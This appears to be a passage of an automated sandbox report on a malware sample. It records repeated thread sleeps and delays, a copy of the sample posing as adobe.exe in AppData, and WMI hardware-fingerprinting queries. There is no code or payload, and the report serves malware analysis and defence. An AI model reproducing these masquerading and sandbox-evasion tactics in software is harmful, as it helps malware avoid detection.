Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595895	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595535	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595418	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594385	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594271	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597779	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597123	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594686	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594578	Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Window / User API: threadDelayed 7042	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Window / User API: threadDelayed 2783	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 7081	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 2758	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 1231	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 8615	Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 2812	Thread sleep count: 7042 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 2812	Thread sleep count: 2783 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -598718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -597032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -596907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -596771s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -596478s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -596326s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -596079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -595829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -595704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -595579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -595454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -595204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -595079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594305s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -594044s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -593927s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180	Thread sleep time: -593688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5256	Thread sleep count: 7081 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5256	Thread sleep count: 2758 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -595895s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -595535s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -595418s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -594385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240	Thread sleep time: -594271s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3932	Thread sleep count: 1231 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3932	Thread sleep count: 8615 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597779s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597123s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -594686s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648	Thread sleep time: -594578s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
